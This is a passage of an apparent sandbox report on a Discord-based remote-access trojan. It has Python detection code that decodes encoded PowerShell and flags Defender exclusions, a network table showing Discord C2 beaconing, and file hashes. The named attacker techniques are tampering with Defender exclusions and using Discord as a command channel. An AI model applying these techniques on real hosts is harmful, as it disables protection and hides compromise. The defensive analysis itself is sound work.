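    accepts abbreviated forms (-e, -ec, -enc, ...), so match on prefix."""
    tokens = [t.strip("\"'") for t in cmdline.split()]
    for i, tok in enumerate(tokens[:-1]):
        if tok.startswith("-") and len(tok) > 1 and "encodedcommand".startswith(tok[1:].lower()):
            return tokens[i + 1]
    return None


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand carries the script as base64 over its UTF-16LE bytes."""
    return base64.b64decode(b64).decode("utf-16-le")


def strip_block_comments(script: str) -> str:
    """Remove <# ... #> block comments and collapse whitespace. In this sample
    the comments hold only junk tokens that vary the encoded string."""
    no_comments = re.sub(r"<#.*?#>", "", script, flags=re.DOTALL)
    return re.sub(r"\s+", " ", no_comments).strip()


def defender_exclusion_paths(script: str) -> list:
    """Paths given to Add-MpPreference -ExclusionPath, or [] if none."""
    clean = strip_block_comments(script)
    if not re.search(r"\bAdd-MpPreference\b", clean, re.IGNORECASE):
        return []
    match = re.search(r"-ExclusionPath\s+(@\([^)]*\)|\S+)", clean, re.IGNORECASE)
    if not match:
        return []
    raw = match.group(1)
    if raw.startswith("@("):
        raw = raw[2:-1]              # unwrap the @( ... ) array literal
    return [p.strip().strip("\"'") for p in raw.split(",") if p.strip()]


def is_broad_exclusion(path: str) -> bool:
    """True for a whole profile, Windows directory or drive root."""
    return path.lower() in BROAD_EXCLUSIONS or bool(DRIVE_ROOT.match(path))


def analyze(cmdline: str) -> dict:
    """Verdict for one process-creation command line (Sysmon EID 1 / 4688)."""
    b64 = extract_encoded_command(cmdline)
    if b64 is None:
        return {"encoded": False, "script": None, "exclusions": [], "severity": "none"}
    script = decode_encoded_command(b64)
    paths = defender_exclusion_paths(script)
    if any(is_broad_exclusion(p) for p in paths):
        severity = "high"    # user profile / whole drive excluded from scanning
    elif paths:
        severity = "medium"  # narrower exclusion, still Defender tampering
    else:
        severity = "low"     # encoded command, no exclusion tampering seen
    return {"encoded": True, "script": script, "exclusions": paths, "severity": severity}


if __name__ == "__main__":
    verdict = analyze(REPORT_CMDLINE)
    print(strip_block_comments(verdict["script"]))
    print(verdict["exclusions"], verdict["severity"])
```

Add-MpPreference only succeeds from an elevated process, so a match on this command line should be read together with the integrity level of the powershell.exe instance (the report also records the AdjustPrivilegeToken signature). On a live host the outcome is visible with `Get-MpPreference | Select-Object -ExpandProperty ExclusionPath`.
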
Network

Country Destination Domain Proto
US 8.8.8.8:53 gateway.discord.gg udp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 8.8.8.8:53 234.130.159.162.in-addr.arpa udp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.137.232:443 discord.com tcp
US 162.159.137.232:443 discord.com tcp
DE 159.89.102.253:443 geolocation-db.com tcp
DE 159.89.102.253:443 geolocation-db.com tcp
US 162.159.137.232:443 discord.com tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.137.232:443 discord.com tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.137.232:443 discord.com tcp
US 162.159.130.234:443 gateway.discord.gg tcp
DE 159.89.102.253:443 geolocation-db.com tcp
US 162.159.137.232:443 discord.com tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.137.232:443 discord.com tcp
US 162.159.130.234:443 gateway.discord.gg tcp
DE 159.89.102.253:443 geolocation-db.com tcp
US 162.159.137.232:443 discord.com tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.137.232:443 discord.com tcp
US 162.159.130.234:443 gateway.discord.gg tcp
DE 159.89.102.253:443 geolocation-db.com tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.137.232:443 discord.com tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.137.232:443 discord.com tcp
US 162.159.130.234:443 gateway.discord.gg tcp
DE 159.89.102.253:443 geolocation-db.com tcp
US 162.159.137.232:443 discord.com tcp
US 162.159.137.232:443 discord.com tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.137.232:443 discord.com tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.137.232:443 discord.com tcp
DE 159.89.102.253:443 geolocation-db.com tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.137.232:443 discord.com tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.137.232:443 discord.com tcp
US 162.159.130.234:443 gateway.discord.gg tcp
DE 159.89.102.253:443 geolocation-db.com tcp
US 162.159.137.232:443 discord.com tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.137.232:443 discord.com tcp
US 162.159.130.234:443 gateway.discord.gg tcp
DE 159.89.102.253:443 geolocation-db.com tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.137.232:443 discord.com tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.137.232:443 discord.com tcp
US 162.159.130.234:443 gateway.discord.gg tcp
DE 159.89.102.253:443 geolocation-db.com tcp
US 162.159.137.232:443 discord.com tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.137.232:443 discord.com tcp
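
The table above lists one row per flow, so the beaconing pattern is easier to read once rows are grouped by destination. The script below is an added example, not part of the report: it parses the first ten rows of the table exactly as written, groups them by domain, separates pure DNS lookups from actual sessions, and attaches the role each destination plays for a Discord-based RAT. That role mapping (the Discord gateway as the command channel, discord.com as the REST API, geolocation-db.com as a victim geolocation lookup) is the analyst's interpretation, not something the sandbox asserts.

```python
"""Group the report's Network rows by destination and label their role."""
from collections import defaultdict

# The first ten rows of the report's Network table, copied as written
# (the report's own data, not a constructed sample):
# country, destination ip:port, domain, protocol.
NETWORK_ROWS = """\
US 8.8.8.8:53 gateway.discord.gg udp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 8.8.8.8:53 234.130.159.162.in-addr.arpa udp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.137.232:443 discord.com tcp
US 162.159.137.232:443 discord.com tcp
DE 159.89.102.253:443 geolocation-db.com tcp
DE 159.89.102.253:443 geolocation-db.com tcp
"""

# Role of each destination for a Discord-based RAT. This mapping is the
# analyst's interpretation (an assumption), not a statement the report makes.
ROLES = {
    "gateway.discord.gg": "C2 command channel (Discord gateway)",
    "discord.com": "C2 API / upload (Discord REST API)",
    "geolocation-db.com": "victim geolocation lookup",
}


def parse_rows(text: str) -> list:
    """Turn the whitespace-separated table rows into records."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # header or blank line
        country, dest, domain, proto = parts
        ip, _, port = dest.rpartition(":")
        rows.append({"country": country, "ip": ip, "port": int(port),
                     "domain": domain, "proto": proto})
    return rows


def summarize(rows: list) -> dict:
    """Group flows by domain: count, distinct peer IPs, and whether the name
    was actually connected to rather than only resolved (port 53)."""
    summary = defaultdict(lambda: {"flows": 0, "ips": set(),
                                   "connected": False, "role": "unclassified"})
    for r in rows:
        entry = summary[r["domain"]]
        entry["flows"] += 1
        entry["ips"].add(r["ip"])
        if r["port"] != 53:
            entry["connected"] = True
        entry["role"] = ROLES.get(r["domain"], "unclassified")
    return dict(summary)


def reverse_lookups(rows: list) -> list:
    """PTR queries (in-addr.arpa); here the sample resolves its gateway
    peer 162.159.130.234 back to a name."""
    return [r["domain"] for r in rows if r["domain"].endswith(".in-addr.arpa")]


def c2_domains(summary: dict) -> list:
    """Domains the sample actually connected to that play a C2 role."""
    return sorted(d for d, e in summary.items()
                  if e["connected"] and e["role"].startswith("C2"))


if __name__ == "__main__":
    parsed = parse_rows(NETWORK_ROWS)
    grouped = summarize(parsed)
    for domain, e in sorted(grouped.items(), key=lambda kv: -kv[1]["flows"]):
        print(f"{domain:32} flows={e['flows']:2} ips={sorted(e['ips'])} role={e['role']}")
    print("PTR lookups:", reverse_lookups(parsed))
    print("C2 domains:", c2_domains(grouped))
```

Over the full table the pattern is the same at scale: repeated reconnects to gateway.discord.gg on 162.159.130.234:443 with a geolocation-db.com request every few cycles. Both Discord hosts resolve to Cloudflare addresses (162.159.0.0/16), so an IP block would hit far more than Discord; detection has to key on the domain or TLS SNI, or on the unexpected process (a binary in %TEMP%) opening the connection.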

Files

C:\Users\Admin\AppData\Local\Temp\system.exe

MD5 a6fd55f1f13b0b71ac19c900593f51d9
SHA1 6339d97a1a97ba2531551aba4cb06eedd9d7c12a
SHA256 431f51f4ab1544899916bace447a602dc21386310a92677e0e96d22ece2a7b56
SHA512 a161d6876e0df731130718b22c466b39d95508749311e2cc5579b2e629cf9838054421b03b47acc50e37c12dfe5ca0f8d0fc75a71dacaceb7d591193784101c2

memory/5004-12-0x00007FFE17283000-0x00007FFE17285000-memory.dmp

memory/5004-11-0x000001C976370000-0x000001C976388000-memory.dmp

memory/5004-13-0x000001C978AE0000-0x000001C978CA2000-memory.dmp

memory/5004-15-0x00007FFE17280000-0x00007FFE17D42000-memory.dmp

memory/2416-16-0x0000000002740000-0x0000000002776000-memory.dmp

memory/2416-17-0x0000000005340000-0x000000000596A000-memory.dmp

memory/4956-19-0x0000000004B80000-0x0000000004BA2000-memory.dmp

memory/4956-21-0x0000000005420000-0x0000000005486000-memory.dmp

memory/4956-20-0x0000000004D20000-0x0000000004D86000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_socklxkz.54u.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4956-22-0x0000000005590000-0x00000000058E7000-memory.dmp

memory/2988-48-0x00000176D03D0000-0x00000176D08F8000-memory.dmp

memory/2416-58-0x0000000005F60000-0x0000000005F7E000-memory.dmp

memory/2416-59-0x0000000006500000-0x000000000654C000-memory.dmp

memory/2416-79-0x0000000007170000-0x00000000071A4000-memory.dmp

memory/2416-89-0x0000000006570000-0x000000000658E000-memory.dmp

memory/2416-80-0x0000000073CD0000-0x0000000073D1C000-memory.dmp

memory/2416-90-0x00000000071B0000-0x0000000007254000-memory.dmp

memory/4956-91-0x0000000073CD0000-0x0000000073D1C000-memory.dmp

memory/2232-108-0x0000000073CD0000-0x0000000073D1C000-memory.dmp

memory/2416-117-0x0000000007900000-0x0000000007F7A000-memory.dmp

memory/2416-118-0x00000000072C0000-0x00000000072DA000-memory.dmp

memory/2416-120-0x0000000007350000-0x000000000735A000-memory.dmp

memory/3416-129-0x0000000073CD0000-0x0000000073D1C000-memory.dmp

memory/2232-138-0x0000000007B30000-0x0000000007BC6000-memory.dmp

memory/2416-140-0x00000000074D0000-0x00000000074E1000-memory.dmp

memory/1888-149-0x0000000073CD0000-0x0000000073D1C000-memory.dmp

memory/2232-159-0x0000000007AF0000-0x0000000007AFE000-memory.dmp

memory/4956-168-0x0000000007000000-0x0000000007015000-memory.dmp

memory/5096-169-0x0000000073CD0000-0x0000000073D1C000-memory.dmp

memory/4956-179-0x00000000070F0000-0x000000000710A000-memory.dmp

memory/4968-189-0x0000000073CD0000-0x0000000073D1C000-memory.dmp

memory/4956-200-0x00000000070E0000-0x00000000070E8000-memory.dmp

memory/2556-198-0x0000000073CD0000-0x0000000073D1C000-memory.dmp

memory/2576-217-0x0000000073CD0000-0x0000000073D1C000-memory.dmp

memory/5264-244-0x0000000073CD0000-0x0000000073D1C000-memory.dmp

memory/5588-262-0x0000000073CD0000-0x0000000073D1C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 23b7371a9b8662e17661d35d484211ed
SHA1 c9f83e685d35c5a6e6360e8e67f4d564eb737ee5
SHA256 1d39ff6613b02f75929d271db0e55452a42a560da36df2644269c45f0dd81e4d
SHA512 a2e87f64d9ff7fd91b7d76f7c953a6a9fb64d83c79637d6a745a3f42ab07b74a568fe0c7fa46de0106b6312d87975a36f750a42f31ccde2575394d80138b1422

memory/5920-291-0x0000000073CD0000-0x0000000073D1C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 ac4917a885cf6050b1a483e4bc4d2ea5
SHA1 b1c0a9f27bd21c6bbb8e9be70db8777b4a2a640f
SHA256 e39062a62c3c7617feeeff95ea8a0be51104a0d36f46e44eea22556fda74d8d9
SHA512 092c67a3ecae1d187cad72a8ea1ea37cb78a0cf79c2cd7fb88953e5990669a2e871267015762fd46d274badb88ac0c1d73b00f1df7394d89bed48a3a45c2ba3d

memory/1560-302-0x0000000073CD0000-0x0000000073D1C000-memory.dmp

memory/2480-312-0x0000000073CD0000-0x0000000073D1C000-memory.dmp

memory/6184-338-0x0000000073CD0000-0x0000000073D1C000-memory.dmp

memory/6460-356-0x0000000073CD0000-0x0000000073D1C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 535b473ec3e9c0fd5aad89062d7f20e8
SHA1 c900f90b3003452b975185c27bfb44c8f0b552c4
SHA256 f6bb190101537e41901392fb690045c5bf1cddaa954630e57c5d0b3410b2d6b0
SHA512 33f286b06e9198ca8ae5225c7796f0f176282e2386fa93a2450e1a65cdb235932ef8a0a778f6b16945f1496a5e12e3ba6e3905f02a47a9cbb92e14448f463c86

memory/6864-369-0x0000000073CD0000-0x0000000073D1C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a2c47ebd6f9c0c7a2b6dfd11134a32e7
SHA1 058941f5ecb2fc474ee8aff5de5d49717ef74727
SHA256 c73978c0ac93a83514b1eeae264e87e9e075c9b7bb4d655538218d37a11c35f6
SHA512 46ae110e07c640f2238ee7dd7bf04b7d98a6013863b2903e7b9f3e16d4c31a52ffb60bff0a640466934e12bbe6b0473c87a93aca3162a06e5f4c2d3b30d2b400

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d59cf70b8ddf763470677e129c316274
SHA1 7dea93838860bcabce7d784c2ac40155e2467e7d
SHA256 87aea0f44a89f325be5db37b6d36a241c486fa27c4c332e84aa3a207ee0130a2
SHA512 343206be1fb5e26cd0facc9e0f58474ea4bfeb815a801202284da62c6ea92469fc8836a37dfd3ae9c018be995e61b88e09d21d8830f09b4698c2d6a184338911

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 dca12cb41dc85a3b12e1d1b4ba9ee9a5
SHA1 3a408fb4e15518049266b9161d759d9ae2caabb1
SHA256 255907c1f4d2e605a1ec9fa09c3a34b2d98a59e006a42d6980c236679664052e
SHA512 968f6a3c158f5c56f5828c4311a6fb274aa35ad72123eb5be7e179f425e7292488eca64800f257bae640b8fe1f05ece822e449fa23f652b13787a892d8d5c8b5

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 156557f9f5b4a3e093c80c62b15987b3
SHA1 d42c6a2fb2a5ef7a5bcf8afa622f16c852fde12c
SHA256 6c15dc3c52d2a64cd99d91df2701c04ed005b65900be75f23459fad555558d3f
SHA512 5b4e0190fe2a863fe292b1e3f25a60b2337edc122ef08377c7f4a11c2c3b526419d39de0fd5e846c046ef047c98f7bc13e0cfe5ead9ccd0e0c50262e6b5b3acf

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6fa2ce1f781ef8b2283ac643098f55d2
SHA1 a6238114cc583316a4c6442d50d3a52be3f67f3a
SHA256 80e226f71dc46157fb1fba62d4276502cb4e9e18d9fe4d66d83bb611639a1e6b
SHA512 a559b90a5418e4e3908c3b0cdae3f77cd6d9d2407b517a598a5cb9e62a149626c9c3b9596f3011831f87bd659149d004cbbebf27abea870b1c31bee7250722db

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d870b47f0ec9514e878b2f180ce777b4
SHA1 67d35573848d06299c9e16d83ce605fa4f6c05b9
SHA256 0de7c2857096ad7edfa63eb668ef725a1340c20d1bbc3e50adbb59e78613abd4
SHA512 8aea7af34768d4dda8843b395ef41864f6fc0f37dd2d52bdb56fb6997fc4d2391dde6597c44ae505fafcd161ec537761e621e629bee3c069b6b40ac3b6978b73